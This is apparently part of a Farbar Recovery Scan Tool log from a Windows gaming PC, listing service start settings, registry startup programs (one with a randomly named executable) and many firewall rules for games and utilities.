MSCONFIG\Services: BFE => 2
MSCONFIG\Services: BITS => 2
MSCONFIG\Services: Browser => 3
MSCONFIG\Services: bthserv => 3
MSCONFIG\Services: CertPropSvc => 3
MSCONFIG\Services: clr_optimization_v4.0.30319_32 => 2
MSCONFIG\Services: clr_optimization_v4.0.30319_64 => 2
MSCONFIG\Services: COMSysApp => 3
MSCONFIG\Services: CryptSvc => 2
MSCONFIG\Services: CscService => 2
MSCONFIG\Services: defragsvc => 3
MSCONFIG\Services: Dhcp => 2
MSCONFIG\Services: DiagTrack => 2
MSCONFIG\Services: DisplayFusionService => 2
MSCONFIG\Services: Dnscache => 2
MSCONFIG\Services: dot3svc => 3
MSCONFIG\Services: DPS => 2
MSCONFIG\Services: EapHost => 3
MSCONFIG\Services: EFS => 3
MSCONFIG\Services: eventlog => 2
MSCONFIG\Services: EventSystem => 2
MSCONFIG\Services: Fax => 3
MSCONFIG\Services: fdPHost => 3
MSCONFIG\Services: FDResPub => 3
MSCONFIG\Services: FlexNet Licensing Service => 3
MSCONFIG\Services: FontCache => 2
MSCONFIG\Services: FontCache3.0.0.0 => 3
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: gusvc => 3
MSCONFIG\Services: Hamachi2Svc => 2
MSCONFIG\Services: hidserv => 3
MSCONFIG\Services: HiPatchService => 2
MSCONFIG\Services: hkmsvc => 3
MSCONFIG\Services: HnGSteamService => 3
MSCONFIG\Services: HomeGroupListener => 3
MSCONFIG\Services: HomeGroupProvider => 3
MSCONFIG\Services: idsvc => 3
MSCONFIG\Services: IEEtwCollectorService => 3
MSCONFIG\Services: IKEEXT => 2
MSCONFIG\Services: IPBusEnum => 3
MSCONFIG\Services: iphlpsvc => 2
MSCONFIG\Services: KeyIso => 3
MSCONFIG\Services: KtmRm => 3
MSCONFIG\Services: LanmanServer => 2
MSCONFIG\Services: LanmanWorkstation => 2
MSCONFIG\Services: lltdsvc => 3
MSCONFIG\Services: lmhosts => 2
MSCONFIG\Services: MBAMService => 2
MSCONFIG\Services: MMCSS => 2
MSCONFIG\Services: MozillaMaintenance => 3
MSCONFIG\Services: MpsSvc => 2
MSCONFIG\Services: MSDTC => 3
MSCONFIG\Services: MSiSCSI => 3
MSCONFIG\Services: msiserver => 3
MSCONFIG\Services: napagent => 3
MSCONFIG\Services: Netlogon => 3
MSCONFIG\Services: Netman => 3
MSCONFIG\Services: netprofm => 3
MSCONFIG\Services: NlaSvc => 2
MSCONFIG\Services: nsi => 2
MSCONFIG\Services: NvContainerLocalSystem => 2
MSCONFIG\Services: NvContainerNetworkService => 3
MSCONFIG\Services: NVDisplay.ContainerLocalSystem => 2
MSCONFIG\Services: NvTelemetryContainer => 2
MSCONFIG\Services: Origin Client Service => 3
MSCONFIG\Services: ose64 => 3
MSCONFIG\Services: osppsvc => 3
MSCONFIG\Services: p2pimsvc => 3
MSCONFIG\Services: p2psvc => 3
MSCONFIG\Services: PcaSvc => 2
MSCONFIG\Services: PeerDistSvc => 3
MSCONFIG\Services: PerfHost => 3
MSCONFIG\Services: pla => 3
MSCONFIG\Services: PNRPAutoReg => 3
MSCONFIG\Services: PNRPsvc => 3
MSCONFIG\Services: PolicyAgent => 3
MSCONFIG\Services: Power => 2
MSCONFIG\Services: ProtectedStorage => 3
MSCONFIG\Services: QWAVE => 3
MSCONFIG\Services: RasAuto => 3
MSCONFIG\Services: RasMan => 3
MSCONFIG\Services: Razer Game Scanner Service => 2
MSCONFIG\Services: RemoteRegistry => 3
MSCONFIG\Services: RpcLocator => 3
MSCONFIG\Services: SamSs => 2
MSCONFIG\Services: SCardSvr => 3
MSCONFIG\Services: SCPolicySvc => 3
MSCONFIG\Services: SDRSVC => 3
MSCONFIG\Services: SDScannerService => 2
MSCONFIG\Services: SDUpdateService => 2
MSCONFIG\Services: SDWSCService => 2
MSCONFIG\Services: seclogon => 3
MSCONFIG\Services: SENS => 2
MSCONFIG\Services: SensrSvc => 3
MSCONFIG\Services: SessionEnv => 3
MSCONFIG\Services: ShellHWDetection => 2
MSCONFIG\Services: SkypeUpdate => 2
MSCONFIG\Services: SNMPTRAP => 3
MSCONFIG\Services: Spooler => 2
MSCONFIG\Services: sppuinotify => 3
MSCONFIG\Services: SSDPSRV => 3
MSCONFIG\Services: SstpSvc => 3
MSCONFIG\Services: Steam Client Service => 3
MSCONFIG\Services: stisvc => 2
MSCONFIG\Services: swprv => 3
MSCONFIG\Services: SysMain => 3
MSCONFIG\Services: TabletInputService => 3
MSCONFIG\Services: TapiSrv => 3
MSCONFIG\Services: TBS => 3
MSCONFIG\Services: TeamViewer => 2
MSCONFIG\Services: TermService => 3
MSCONFIG\Services: Themes => 2
MSCONFIG\Services: THREADORDER => 3
MSCONFIG\Services: TrkWks => 2
MSCONFIG\Services: TrustedInstaller => 3
MSCONFIG\Services: TunngleService => 3
MSCONFIG\Services: UI0Detect => 3
MSCONFIG\Services: UmRdpService => 3
MSCONFIG\Services: upnphost => 3
MSCONFIG\Services: UxSms => 2
MSCONFIG\Services: VaultSvc => 3
MSCONFIG\Services: vds => 3
MSCONFIG\Services: VSS => 3
MSCONFIG\Services: W32Time => 3
MSCONFIG\Services: WatAdminSvc => 3
MSCONFIG\Services: wbengine => 3
MSCONFIG\Services: WbioSrvc => 3
MSCONFIG\Services: wcncsvc => 3
MSCONFIG\Services: WcsPlugInService => 3
MSCONFIG\Services: WdiServiceHost => 3
MSCONFIG\Services: WdiSystemHost => 3
MSCONFIG\Services: WebClient => 3
MSCONFIG\Services: Wecsvc => 3
MSCONFIG\Services: wercplsupport => 3
MSCONFIG\Services: WerSvc => 3
MSCONFIG\Services: WinDefend => 3
MSCONFIG\Services: WinHttpAutoProxySvc => 3
MSCONFIG\Services: Winmgmt => 2
MSCONFIG\Services: WinRM => 3
MSCONFIG\Services: Wlansvc => 3
MSCONFIG\Services: wlidsvc => 2
MSCONFIG\Services: wmiApSrv => 3
MSCONFIG\Services: WPCSvc => 3
MSCONFIG\Services: WPDBusEnum => 3
MSCONFIG\Services: WsAppService => 2
MSCONFIG\Services: wscsvc => 2
MSCONFIG\Services: WSearch => 2
MSCONFIG\Services: wuauserv => 2
MSCONFIG\Services: wudfsvc => 2
MSCONFIG\Services: WwanSvc => 3
MSCONFIG\startupreg: Actual Multiple Monitors => "C:\Program Files (x86)\Actual Multiple Monitors\ActualMultipleMonitorsCenter.exe"
MSCONFIG\startupreg: AudioSwitcher => "C:\Users\Martin\AppData\Local\Temp\Rar$EXa0.926\AudioSwitcher.exe"
MSCONFIG\startupreg: CloneCDTray => "C:\Program Files (x86)\SlySoft\CloneCD\CloneCDTray.exe" /s
MSCONFIG\startupreg: DAEMON Tools Lite => "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
MSCONFIG\startupreg: DisplayFusion => "C:\Program Files (x86)\DisplayFusion\DisplayFusion.exe"
MSCONFIG\startupreg: EVEMon => "C:\Program Files (x86)\EVEMon\EVEMon.exe" -startMinimized
MSCONFIG\startupreg: f.lux => "C:\Users\Martin\AppData\Local\FluxSoftware\Flux\flux.exe" /noshow
MSCONFIG\startupreg: HP ENVY 4520 series (NET) => "C:\Program Files\HP\HP ENVY 4520 series\Bin\ScanToPCActivationApp.exe" -deviceID "TH5BO3M1CC0660:NW" -scfn "HP ENVY 4520 series (NET)" -AutoStart 1
MSCONFIG\startupreg: MSC => "C:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
MSCONFIG\startupreg: ProfilerU => C:\Program Files\SmartTechnology\Software\ProfilerU.exe
MSCONFIG\startupreg: Razer Synapse => "C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe"
MSCONFIG\startupreg: RTHDVCPL => "C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe" -s
MSCONFIG\startupreg: RUSH => C:\Program Files (x86)\Fnatic Gear\RUSH\RUSH_Core.exe
MSCONFIG\startupreg: SaiMfd => C:\Program Files\SmartTechnology\Software\SaiMfd.exe
MSCONFIG\startupreg: Salus => C:\Program Files (x86)\f552dd4c52e3\b786bdb3c67d.exe
MSCONFIG\startupreg: SDTray => "C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe"
MSCONFIG\startupreg: SpybotPostWindows10UpgradeReInstall => "C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe"
MSCONFIG\startupreg: Steam => "C:\Program Files (x86)\Steam\steam.exe" -silent
MSCONFIG\startupreg: USB3MON => "C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe"
MSCONFIG\startupreg: Vivaldi Update Notifier => "C:\Program Files\Vivaldi\Application\update_notifier.exe"
MSCONFIG\startupreg: XboxStat => "C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe" silentrun

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{BCC7BE45-5ACA-4815-B066-515800CB6B4B}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{2E3E76CC-A240-4BC9-B75D-B21DA2449E27}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [TCP Query User{4AFEF7FC-5364-4559-B298-316BF152B16B}D:\spel\steam library\steamapps\common\magicka\magicka.exe] => (Allow) D:\spel\steam library\steamapps\common\magicka\magicka.exe
FirewallRules: [UDP Query User{B9880637-F1BB-4C85-9925-0C3923E020A5}D:\spel\steam library\steamapps\common\magicka\magicka.exe] => (Allow) D:\spel\steam library\steamapps\common\magicka\magicka.exe
FirewallRules: [TCP Query User{CDDFC1AC-FBDD-43A7-9C65-2D0964B25B74}D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe] => (Allow) D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe
FirewallRules: [UDP Query User{8D82C04F-BF9A-4701-B315-1F3B967766F3}D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe] => (Allow) D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe
FirewallRules: [TCP Query User{627D9905-8B9E-47FF-A117-17E145D698DC}D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe] => (Allow) D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe
FirewallRules: [UDP Query User{5DBF1606-7F85-4C2C-824E-EDFC11BD990D}D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe] => (Allow) D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe
FirewallRules: [{FFDBE546-B8A5-49BE-90B7-42976EBA4237}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{E6FA73F3-7E35-4D33-9FE2-82ED8D6F4AFC}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{8D467693-5B77-4BE8-AE9C-0E9B563FFEAE}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{18C8350D-3057-4C5F-BAD2-725D1C1DECE7}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [TCP Query User{55EF3563-1C59-42E3-A4F0-9444A74C3E45}D:\spel\torchlight ii\torchlight2.exe] => (Allow) D:\spel\torchlight ii\torchlight2.exe
FirewallRules: [UDP Query User{5C7C4B4A-69D3-483D-8A9C-DED0AC778BCD}D:\spel\torchlight ii\torchlight2.exe] => (Allow) D:\spel\torchlight ii\torchlight2.exe
FirewallRules: [{45C6EBB6-3B50-46EE-8980-667A09FCEBD8}] => (Allow) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
FirewallRules: [{828A5790-20F0-4956-BEB8-5409DF94B749}] => (Allow) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
FirewallRules: [{73B9B64C-3636-4CFD-A396-519632DF134D}] => (Allow) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
FirewallRules: [{28448C4B-6FAC-45AB-AAF2-7B85D28E66AA}] => (Allow) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
FirewallRules: [TCP Query User{1EC0261B-37E5-4385-B272-9F7BEB055D4F}D:\spel\torchlight ii\torchlight2.exe] => (Allow) D:\spel\torchlight ii\torchlight2.exe
FirewallRules: [UDP Query User{759BC82D-B0DC-4F60-8BF7-9B7C657D9AD8}D:\spel\torchlight ii\torchlight2.exe] => (Allow) D:\spel\torchlight ii\torchlight2.exe
FirewallRules: [TCP Query User{0EF4E498-8DB1-439E-B6AA-EAB36450D94B}D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe] => (Allow) D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe
FirewallRules: [UDP Query User{D7B1A737-8140-4BF3-A072-18BB4055E961}D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe] => (Allow) D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe
FirewallRules: [TCP Query User{E900344C-C1D2-4B5A-8C5E-A2FA76B69DCF}D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe] => (Allow) D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe
FirewallRules: [UDP Query User{A5CC0085-DDB9-46E6-9D7F-C3D29ADFC80B}D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe] => (Allow) D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe
FirewallRules: [{CE40884C-D69D-4465-979B-BA4B30B9422E}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Magicka\Magicka.exe
FirewallRules: [{266CFBBD-8D67-4C75-979F-4A9A8AB47588}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Magicka\Magicka.exe
FirewallRules: [TCP Query User{DEF1856C-BB33-44D0-93E7-9412C14515BA}C:\program files (x86)\steam\steam.exe] => (Allow) C:\program files (x86)\steam\steam.exe
FirewallRules: [UDP Query User{54A34DA2-9A0B-4380-A28B-AB3B5CCF882F}C:\program files (x86)\steam\steam.exe] => (Allow) C:\program files (x86)\steam\steam.exe
FirewallRules: [{61949EEE-5F62-40E1-80A6-E35482F3B71D}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Trine 2\trine2_launcher.exe
FirewallRules: [{0CDB1C6D-EC84-4F79-BE49-01DA29FC333D}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Trine 2\trine2_launcher.exe
FirewallRules: [{88C5EC1F-9F0C-4BC6-969B-98A5B600471E}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{1C04E8C1-5BE1-41A4-A81D-744CA624EC02}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{E5B4D7C5-07BE-4454-BF77-0EB6C80047D4}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{D4211A51-4CEC-4289-B7A1-430D4D240889}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{9B851F42-1FC8-41E4-8FEE-20948E6A2EE2}] => (Allow) D:\Spel\Rainbow Six Vegas 2\Binaries\R6Vegas2_Game.exe
FirewallRules: [{977CFC13-A7A2-4185-BC37-56982093CA7C}] => (Allow) D:\Spel\Rainbow Six Vegas 2\Binaries\R6Vegas2_Game.exe
FirewallRules: [{B9F172E7-6FA5-4EC8-A9CA-3F8595D0E566}] => (Allow) D:\Spel\Rainbow Six Vegas 2\Binaries\R6Vegas2_Launcher.exe
FirewallRules: [{9E83C0FE-4B23-463A-B83E-2EB3EAE5F80F}] => (Allow) D:\Spel\Rainbow Six Vegas 2\Binaries\R6Vegas2_Launcher.exe
FirewallRules: [{53E8919F-68FF-4BA8-8522-FA2F5301F9D2}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{0461EBF1-7790-46AD-9455-39076D092A87}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{91EE7751-797C-4734-A64E-422748E809CF}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{9147620D-AC70-4F7B-9DC6-14750D3EA729}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{6D2F2A72-BAF3-4580-ABD1-490BF2F2FD5C}] => (Allow) D:\Spel\Battle for middle earth 2\game.dat
FirewallRules: [{35458669-7E78-4505-8146-C2DC82096E56}] => (Allow) D:\Spel\Battle for middle earth 2\game.dat
FirewallRules: [{6C0610D3-B27F-4795-BFE9-09046B8D93A4}] => (Allow) D:\Spel\Breach\Binaries\Win32\UDK.exe
FirewallRules: [{32B5C767-EA76-4FA6-8B6B-941A767CB7FF}] => (Allow) D:\Spel\Breach\Binaries\Win32\UDK.exe
FirewallRules: [TCP Query User{115CC196-11CD-4A9A-848A-6938D2300FEC}D:\spel\steam library\steamapps\common\trine 2\trine2_32bit.exe] => (Allow) D:\spel\steam library\steamapps\common\trine 2\trine2_32bit.exe
FirewallRules: [UDP Query User{31028D38-37E1-4AE1-A4D3-E17A7827C183}D:\spel\steam library\steamapps\common\trine 2\trine2_32bit.exe] => (Allow) D:\spel\steam library\steamapps\common\trine 2\trine2_32bit.exe
FirewallRules: [TCP Query User{D26D34ED-C6DC-4548-8E4A-F9B1D8C9F3D4}D:\spel\company of heroes\reliccoh.exe] => (Allow) D:\spel\company of heroes\reliccoh.exe
FirewallRules: [UDP Query User{3BF9E913-01AA-4CD6-9791-02D20E6E21B3}D:\spel\company of heroes\reliccoh.exe] => (Allow) D:\spel\company of heroes\reliccoh.exe
FirewallRules: [TCP Query User{D194207E-DDFD-4627-A0FC-BE2AEDBF6E7E}D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win64\udk.exe] => (Allow) D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win64\udk.exe
FirewallRules: [UDP Query User{F24EFC90-BBE5-41F9-9D0E-E8B90B1940EF}D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win64\udk.exe] => (Allow) D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win64\udk.exe
FirewallRules: [{E543B941-B036-4E0B-8C3A-402A4504914E}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{D6A8053A-49C3-49B7-8F59-73AEE955C61F}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{FAC44A78-780D-426C-AF18-E1732DB54315}] => (Allow) D:\Spel\Battle.net\Battle.net.exe
FirewallRules: [{C6840C5F-EED4-40C0-B62C-09EA5DDF5C54}] => (Allow) D:\Spel\Battle.net\Battle.net.exe
FirewallRules: [{1AF22D79-FBE2-403D-8EB4-89EC28BFB2D2}] => (Allow) D:\Spel\Hearthstone\Hearthstone.exe
FirewallRules: [{D1C3AB65-7BCE-4E3F-B7E3-702CE1A76B6F}] => (Allow) D:\Spel\Hearthstone\Hearthstone.exe
FirewallRules: [{7C9C72EB-F655-4B26-80A3-872C50D6C853}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{CC7899A3-3B5F-4AA2-ADFB-0DFA2664FC0B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{F611C6D4-FBAC-498B-950F-DF8B93E825BB}] => (Allow) C:\Program Files (x86)\Winamp\winamp.exe
FirewallRules: [{C6B12067-A165-42B4-8493-1427A24499EF}] => (Allow) C:\Program Files (x86)\Winamp\winamp.exe
FirewallRules: [{352241C8-F360-47FD-BB61-A99048135DF5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{1F00559E-8678-4CA4-80D8-F4828CDE89AA}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{80DCBFFD-115F-4B87-8D59-93ACF03B341D}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{3294C900-CB00-4E0F-BC69-4821E9831571}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{93986157-C87E-4AFE-96A8-FD7CD0ABD567}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{809F66C2-6701-4313-8B10-7B8BD900866B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{4FC1668A-CB01-4DD7-9DAE-C7F25A440247}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Terraria\Terraria.exe
FirewallRules: [{1E88176E-755C-4681-BBD0-B30DC3F068D5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Terraria\Terraria.exe
FirewallRules: [{79792EA2-C9DE-4298-926B-BC90F3195376}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{84979D94-0AEB-46C3-969C-9B16766CB14C}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{0842EC48-341B-4BE5-8806-F895B1A02DD5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Cortex Command\Cortex Command.exe
FirewallRules: [{5876B581-FA66-4BC7-8A00-35BF03AB8A02}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Cortex Command\Cortex Command.exe
FirewallRules: [TCP Query User{F9D61A2D-DF6B-46D6-A53E-2E436D01180B}D:\spel\artemis\artemis.exe] => (Allow) D:\spel\artemis\artemis.exe
FirewallRules: [UDP Query User{70A3BEC4-CD11-4C95-83F5-225D9ED47A26}D:\spel\artemis\artemis.exe] => (Allow) D:\spel\artemis\artemis.exe
FirewallRules: [{1B617450-991D-493F-A0A4-83E61FCBBDE4}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{92B52AA9-B01C-45B5-92CB-A8217B8519A5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{0966B62F-5434-423E-960F-43C13E70704B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{72CD6C0C-FB9C-4D1F-B641-7BC04AFBBE64}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{A8BDD7FA-BD06-4D31-9129-C0379C81A7DF}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Guns of Icarus Online\GunsOfIcarusOnline.exe
FirewallRules: [{C5D12B7B-9A5B-4D13-A3D0-97737CF55F3B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Guns of Icarus Online\GunsOfIcarusOnline.exe
FirewallRules: [{6F611789-7AF0-4311-A413-5BD1E442E6F2}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2737\Agent.exe
FirewallRules: [{7EE7CEF0-CC26-421D-852B-A41EB04AAA74}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2737\Agent.exe
FirewallRules: [{F5C461FF-689E-4533-A67F-75367B56F40C}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2753\Agent.exe
FirewallRules: [{E398CD22-4D44-47F8-9C19-9A06B908F24B}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2753\Agent.exe
FirewallRules: [TCP Query User{D6794F86-C0B5-4AEA-AB6B-FA39747E18C8}D:\spel\angelsmu.com ex702 v9\main.exe] => (Allow) D:\spel\angelsmu.com ex702 v9\main.exe
FirewallRules: [UDP Query User{A6FE6FA7-0813-4DCE-BEF2-5818F72B3519}D:\spel\angelsmu.com ex702 v9\main.exe] => (Allow) D:\spel\angelsmu.com ex702 v9\main.exe
FirewallRules: [{F489B2AD-61AC-4BD0-9F21-DD536D182F20}] => (Allow) D:\Spel\Steam Library\SteamApps\common\DayZ\DayZ.exe
FirewallRules: [{2BE4269B-F03C-40EA-8C01-4EFE73ADD5A8}] => (Allow) D:\Spel\Steam Library\SteamApps\common\DayZ\DayZ.exe
FirewallRules: [TCP Query User{D4318ABC-EC68-4A88-830A-689E6DD21C84}D:\spel\the settlers 3 - ultimate collection\s3_multi.exe] => (Allow) D:\spel\the settlers 3 - ultimate collection\s3_multi.exe
FirewallRules: [UDP Query User{1456890F-4AA7-4A15-B12A-19A0BB3F99F7}D:\spel\the settlers 3 - ultimate collection\s3_multi.exe] => (Allow) D:\spel\the settlers 3 - ultimate collection\s3_multi.exe
FirewallRules: [TCP Query User{B581FB4E-4169-4D34-B684-8EB647EB97DD}C:\windows\syswow64\dplaysvr.exe] => (Allow) C:\windows\syswow64\dplaysvr.exe
FirewallRules: [UDP Query User{4F52FEA6-04DD-4CC9-BCD4-90E15D3600BB}C:\windows\syswow64\dplaysvr.exe] => (Allow) C:\windows\syswow64\dplaysvr.exe
FirewallRules: [TCP Query User{8CFF32A0-B686-4BDB-A678-E53ED8DD54BD}D:\spel\the settlers 3 - ultimate collection\s3.exe] => (Allow) D:\spel\the settlers 3 - ultimate collection\s3.exe
FirewallRules: [UDP Query User{63D32474-73BA-4E2C-BF1B-530850F77567}D:\spel\the settlers 3 - ultimate collection\s3.exe] => (Allow) D:\spel\the settlers 3 - ultimate collection\s3.exe
FirewallRules: [TCP Query User{5F8388FA-07B6-46FA-A85A-BDC61AEB2896}D:\spel\warsow\warsow.exe] => (Allow) D:\spel\warsow\warsow.exe
FirewallRules: [UDP Query User{EAE8ECFA-BA38-4F2A-B311-F74C7B6A09DD}D:\spel\warsow\warsow.exe] => (Allow) D:\spel\warsow\warsow.exe
FirewallRules: [TCP Query User{D04B26D3-05BF-4467-96C6-F5EFCEA9A568}C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe] => (Allow) C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
FirewallRules: [UDP Query User{ECD07AB0-51C7-415D-8B98-F1A1FC702136}C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe] => (Allow) C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
FirewallRules: [{814455B8-D927-4DF5-B1FE-25FFAB4E2FE7}] => (Allow) D:\Spel\Heroes & Generals\live\hng.exe
FirewallRules: [{3FF9881D-DCDE-42EA-B1E9-4D0465089615}] => (Allow) D:\Spel\Heroes & Generals\live\hng.exe
FirewallRules: [TCP Query User{C02949D8-6746-4BCF-956E-4B55C69F0F0C}C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe] => (Allow) C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe
FirewallRules: [UDP Query User{70FBBFBB-B33D-4CC7-94F3-4A41468DFDC9}C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe] => (Allow) C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe
FirewallRules: [TCP Query User{D599766A-387D-4295-A977-8A7C4CD34D2F}D:\spel\goat simulator\binaries\win32\goatgame-win32-shipping.exe] => (Block) D:\spel\goat simulator\binaries\win32\goatgame-win32-shipping.exe
FirewallRules: [UDP Query User{547CD1BA-D1F9-4CA9-B13D-B5840050F926}D:\spel\goat simulator\binaries\win32\goatgame-win32-shipping.exe] => (Block) D:\spel\goat simulator\binaries\win32\goatgame-win32-shipping.exe
FirewallRules: [TCP Query User{DE6C67B3-404F-4E00-A294-F9A4AFC2C855}D:\spel\resident evil 6\bh6.exe] => (Block) D:\spel\resident evil 6\bh6.exe
FirewallRules: [UDP Query User{A388931D-F8A0-43AF-A9EE-3F2F1AB0D802}D:\spel\resident evil 6\bh6.exe] => (Block) D:\spel\resident evil 6\bh6.exe
FirewallRules: [TCP Query User{AC075F6A-A440-4B5B-8C6E-20668B72EA5D}D:\spel\wolfenstein the new order\wolfneworder_x64.exe] => (Block) D:\spel\wolfenstein the new order\wolfneworder_x64.exe
FirewallRules: [UDP Query User{47E95813-C968-481B-8401-A9F5423D9339}D:\spel\wolfenstein the new order\wolfneworder_x64.exe] => (Block) D:\spel\wolfenstein the new order\wolfneworder_x64.exe
FirewallRules: [TCP Query User{F88826EC-C4A7-4998-88F7-040A1DA49F26}D:\spel\commandos 2\commandos 2\comm2.exe] => (Allow) D:\spel\commandos 2\commandos 2\comm2.exe
FirewallRules: [UDP Query User{472ABE4E-8E97-428A-8634-C1F1221B2FC9}D:\spel\commandos 2\commandos 2\comm2.exe] => (Allow) D:\spel\commandos 2\commandos 2\comm2.exe
FirewallRules: [TCP Query User{A736D87A-8B4B-4C3F-A866-FC053951B367}C:\program files\java\jre6\bin\javaw.exe] => (Allow) C:\program files\java\jre6\bin\javaw.exe
FirewallRules: [UDP Query User{4429C094-F675-4E39-8432-D6A974B313F6}C:\program files\java\jre6\bin\javaw.exe] => (Allow) C:\program files\java\jre6\bin\javaw.exe
FirewallRules: [{A31C0C9A-75B1-46E2-A560-D31AB2D27833}] => (Allow) D:\Spel\Steam Library\SteamApps\common\mark_of_the_ninja\bin\game.exe
FirewallRules: [{AEB337AC-F838-4B4B-8816-B72BEED7EC99}] => (Allow) D:\Spel\Steam Library\SteamApps\common\mark_of_the_ninja\bin\game.exe
